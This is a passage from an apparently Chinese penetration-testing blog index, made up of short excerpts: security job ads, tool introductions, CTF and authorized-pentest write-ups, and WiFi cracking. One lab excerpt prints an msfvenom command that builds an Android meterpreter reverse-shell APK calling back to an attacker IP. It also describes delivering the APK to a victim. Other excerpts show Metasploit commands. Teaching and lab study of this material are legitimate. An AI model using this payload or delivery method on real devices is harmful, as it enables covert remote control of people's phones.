渗透测试_黑客技术

记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

新华三集团诚聘攻防人才！和大牛一起搞站啦！

你和大牛只隔一个工位！有大牛带！和大牛一起搞站！每周技术分享！团队技术氛围好！公司简介：新华三集团（简称新华三）是业界领先的数字化解决方案领导者，致力于成为帮助客户业务创新、数字化转型最可信赖的合作伙伴。新华三拥有计算、存储、网络、安全等完整的数字化基础设施提供能力，能够提供云计算、大数据、大互联、大安全、大安防、物联网、边缘计算、人工智能、区块链在内的一站式、全方位数字化平台解决方案。同时，新华三也是HPE®品牌的服务器、存储和技术服务的中国独家提供商。职位名称：渗透测试工程师职责描述： 1、负责渗透测试项目交付； 2、负责攻防演习攻击工作； 3、负责渗透技术研究、赋能。

发布时间:2021-02-22 15:55 | 阅读:5670 | 评论:0 | 标签:安全招聘 web漏洞原理攻防人才攻防演习新华三集团渗透测试渗透测试工程师攻防

全能无线渗透测试工具，一个LAZY就搞定了

近来一直在研究无线安全方面的东西，特别是在无线渗透测试这块，每次渗透测试时总要来回不停的切换操作和挑选利器，很是麻烦。就想看看是否可以有一款功能全面的集合型工具。正所谓功夫不负有心人，还真有这么一个工具出现在我的眼前。它便是名为LAZY script应用于Kali Linux下的执行脚本。该脚本可以自动执行有关Wi-Fi穿透和黑客攻击的绝大部分应用程序，同时它还集合了大量不同类型的攻击程序，可谓是集众家之长于一身。这么好的东西，必须和各位小伙伴一起分享。其实，这样一款好的工具，不仅可以让从事日常安全工作研究变得得心应手，同时对提高无线安全方面的相关学习提供了极大便利。

发布时间:2021-01-22 15:40 | 阅读:9354 | 评论:0 | 标签:渗透测试渗透

k0otkit：Hack K8s in a K8s Way

文章目录简介Kubernetes环境下的一般渗透过程基本思路基本功能实现迭代一：删除敏感词迭代二：替换Shell为Meterpreter迭代三：无文件化迭代四：分离Payload迭代五：动态容器注入迭代六：解决镜像依赖迭代七：无文件攻击总结攻击者角度防守者角度参考文献往期回顾阅读： 2简介本文涉及到的技术仅供教学、研究使用，禁止用于非法用途。

发布时间:2021-01-11 18:33 | 阅读:17275 | 评论:0 | 标签:安全分享 Kubernetes 渗透测试 hack

使用Ping命令解析主机名解析出来的是IPv6

如果你经常使用ping命令，并身处局域网，那么你肯定会有这样一个疑问：Ping计算机名为何是IPv6地址？问这个问题的人很少见，大多都是对网络知识稍�

发布时间:2021-01-07 21:09 | 阅读:23477 | 评论:0 | 标签:渗透测试

相恨见晚：玩转内网的渗透神器CobaltStrike4

作者：ATL安全团队来自FreeBuf一、介绍内网渗透的神器工具CobaltStrikeCobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具，集成了端口转发、服务扫描，自动化溢出，多模式端口监听，exe、powershell木马生成等。钓鱼攻击包括：站点克隆，目标信息获取，java执行，浏览器自动攻击等。Cobalt Strike 主要用于团队作战，可谓是团队渗透神器，能让多个攻击者同时连接到团体服务器上，共享攻击资源与目标信息和sessions。

发布时间:2020-12-29 16:16 | 阅读:25461 | 评论:0 | 标签:渗透测试渗透

记一次渗透测试后引发的小扩展

这是 酒仙桥六号部队 的第 122 篇文章。全文共计2205个字，预计阅读时长7分钟。背景在一次授权的渗透测试中，由于使用�

发布时间:2020-12-08 12:22 | 阅读:29762 | 评论:0 | 标签:内网渗透 API函数 certutil cmd命令 C语言 js文件 shell wmic wmic os 上传文件免

美团红队安全招聘人才！

美团红队安全招聘 1. 岗位要求： a. 统招本科或以上学历，至少2年以上的安全从业经验，能适应运营和运维工作； b. 具备扎实的计算机及安全技术基础（网络、系统、漏洞利用技术原理等方面）； c. 具备网络攻防及应急响应的经验，具备较强的分析能力； d. 至少熟练掌握一门编程语言，并针对安全漏洞、防御绕过具备较强的exploit自制能力； e. 务实、自驱，具备良好的协调推动、沟通、团队合作能力。

发布时间:2020-10-30 15:34 | 阅读:216355 | 评论:0 | 标签:安全招聘 exploit自制能力入侵检测入侵溯源安全技术安全漏洞安全能力评估安全运营应急响应情报分析渗

白帽黑客教你Kali Linux：数据库密码脆弱性攻防演练下

一、课前声明1、本分享仅做学习交流，请自觉遵守法律法规！2、搜索：Kali 与编程，学习更多网络攻防干货！3、Kali 与编程每天准时更新，敬请学习和关注！二、资源装备1.安装好 Kali Linux 的虚拟机一台2.搭建好Sql server的靶机一个；3.整装待发的小白一个。三、战略安排3.1 进入Metasploit（msf）渗透测试框架，如下图所示。命令：msfconsole3.2 利用Metasploit（msf）渗透框架对目标主机漏洞利用模块进行检索，如下图所示。命令：search mssql_exec3.3 如下图所示，利用检索到的漏洞利用模块。

发布时间:2020-10-22 15:35 | 阅读:30142 | 评论:0 | 标签:渗透测试 linux 黑客白帽攻防

心动网络安全团队高薪招聘

公司介绍我们是一支热爱游戏、热爱用户、充满个性的团队，也是一支有技术、有梦想、坚持初心的团队。自创业以来，我们坚信可以用科技与艺术，智慧与勇气，让世界变得更加有趣和美好。我们敢于颠覆，突破局限，只为还原游戏本身的乐趣，我们坚持探索，乐于创新，不断尝试去赋予游戏以新的形式。我们始终倾听玩家最真实的需求与心声，打造平等且纯粹的游戏社区，也同样不囿于游戏产业，始终致力于提供优质的综合娱乐服务体验。招聘岗位安全运营工程师岗位职责1、安全基础设施的建设与运营，如主机agent、SoC、木马检测、扫描系统、WAF、入侵检测、流量分析等；2、安全系统日志的分析，策略开发与运营；3、安全事件的应急处理。

发布时间:2020-10-09 15:25 | 阅读:289306 | 评论:0 | 标签:安全招聘安全负责人安全运营工程师心动网络招聘渗透测试高薪网络安全安全

白帽黑客与网络安全工程师教你：使用Metasploit进行FTP服务扫描

课前声明：1、本分享仅做学习交流，请自觉遵守法律法规！2、搜索：Kali与编程，学习更多网络攻防干货！3、Kali与编程每天准时更新，敬请学习和关注！3.1 在受害者Win2008 Server虚拟机配置防火墙（关闭防火墙），如下图所示。命令：Win+R/cmd/firewall.cpl3.2 在攻击方主机（Kali Linux主机）代开Postgresql数据库，如下图所示。命令：service postgresql start3.3 在攻击方Kali Linux主机打开Metasploit（msf）渗透框架，如下图所示。

发布时间:2020-10-01 13:46 | 阅读:51042 | 评论:0 | 标签:渗透测试扫描黑客白帽网络安全安全

黑客破解wifi密码-超详细过程

前期准备VMware Workstation虚拟机在虚拟机安装好kail linunx系统无线网卡（芯片为3070或者1887L都支持Linux）一.打开终端，用airmon-ng命令查看如果出现无法访问

发布时间:2020-09-29 15:42 | 阅读:62029 | 评论:0 | 标签:渗透测试黑客破解

CISCN华东南赛区php健康宝wp&思考

前言大家好，我是北京联合大学-小帽，也是本题的出题人。熟悉我的朋友们知道，平时喜欢做做欢乐杂项休闲休闲，所以这次的题目算是个披着web皮的半Misc。由于微信小程序的开发简单、操作方便等优势，很多的公司、部门都喜欢制作小程序简化工作流程。在红蓝对抗、渗透测试等等场景，蓝队的信息中心可能会遗漏小程序这一边界（有可能是某个部门自己找外包做的，信息中心根本不知道它的存在）。而在程序开发过程中，开发者很容易信任某些用户输入，例如直接COPY官方文档中对麦克风、摄像头的操作而忘记了对上传的语音、视频检验。另：复现可能会上BUUOJ，敬请期待。

发布时间:2020-09-28 12:57 | 阅读:30323 | 评论:0 | 标签:CTF agent CISCN php健康宝 SQL注入漏洞渗透测试靶机 PHP

从SQL注入到幸运域控

这是 酒仙桥六号部队 的第 37 篇文章。全文共计2124个字，预计阅读时长8分钟。背景在某个午后，接到上级的任务需要对某个授权的目标进行渗透测试，于是磨刀霍霍向牛羊。寻找突破口由于这次给的目标范围很窄，只有两个域名跟两个IP，本来以为突破口不是那么好搞到，但拿到目标站点打开一看，心里稍微松了一口气，通过站点的氛围来看，应该是个运行很多年的系统了。

发布时间:2020-09-24 16:48 | 阅读:45873 | 评论:0 | 标签:内网渗透 asp木马 shell SQL注入命令socks 哈希域控提权渗透测试甜土豆隧道注入 SQL

一次授权的渗透测试

前言一次正规且授权的测试，未使用任何扫描器，全程手工。这个客户呢是做的一个培训资料的商城。大概样子就是这样，其实当时拿到以后客户说不允许用任何扫描器，还有一点点懵。Thinkphp5.1.37 LTS 加 JQuery 1.7.2开始首先一个账户是必须要有的，难处在于因为验证码还在对接中，没法注册。只能要一个内置账户了。既然是thinkphp，习惯性的先试试runtime缓存目录看在不在。不存在。那么看看源代码直接访问static试试目录遍历，试了upload,js等等，也没有翻出一个有用的，那就进管理中心看看吧。首先是留言板随便提交了个图片，返回看详情。这里我开了抓包。

发布时间:2020-09-07 11:58 | 阅读:23967 | 评论:0 | 标签:渗透测试渗透

xss平台搭建创建项目没反映解决办法

xss平台搭建创建项目没反映解决办法最近有学员反映第五章漏洞学习与挖掘18课 WEB安全第五章漏洞学习与利用02xss利用平台搭建提到的问题问题原因�

发布时间:2020-09-03 00:26 | 阅读:39507 | 评论:0 | 标签:渗透测试 xss

来路不明的安装包请勿安装

前言本次渗透为靶机测试。切勿用于非法用途！攻击者:192.168.1.3 termux+metasploit受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)使用模块:multi/handler首先生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk将其移动到/storage/emulated/0/360目录。并使用蓝牙发送给受害者者。受害者安装即可。回到攻击者,启动msfconsole。

发布时间:2020-09-01 10:04 | 阅读:17579 | 评论:0 | 标签:渗透测试

分享10个渗透测试最佳工具的使用方法及下载链接

渗透测试的目的不仅是找到安全系统的易受攻击元素，还要检查企业中安全策略的合规性，衡量任何安全问题的意识和范围，并查看可能性在真正的外部实体网络攻击事件中，网络可能会遇到什么灾难。实质上，渗透测试允许你发现可能没有考虑过的弱点区域。渗透测试者提供了一种全新的视角，帮助企业改进系统安全和采用更主动的方法。借助专业工具，渗透测试更加有效和高效，以下介绍10种最佳工具。

发布时间:2020-09-01 10:04 | 阅读:33813 | 评论:0 | 标签:渗透测试渗透

白帽子黑客教你：如何使用Dirbuster网站目录扫描神器？

一、背景介绍DirBuster是用来探测web服务器上的目录和隐藏文件的。因为DirBuster是采用java编写的，所以运行前要安装上java的环境。来看一下基本的使用： ①：TargetURL下输入要探测网站的地址，需要注意的是这个地址要加上协议，看网站是http还是https。 ②：WorkMethod是选择工作方式，一个是get请求，一个是自动选择。一般选autoswitch的自动选择，它会自行判断是使用head方式或get方式。 ③：NumberofThread是选择扫描线程数，一般为30。电脑配置好的可根据情况选择。 ④：selectscanningtype是选择扫描类型。

发布时间:2020-08-30 09:33 | 阅读:29772 | 评论:0 | 标签:渗透测试扫描黑客白帽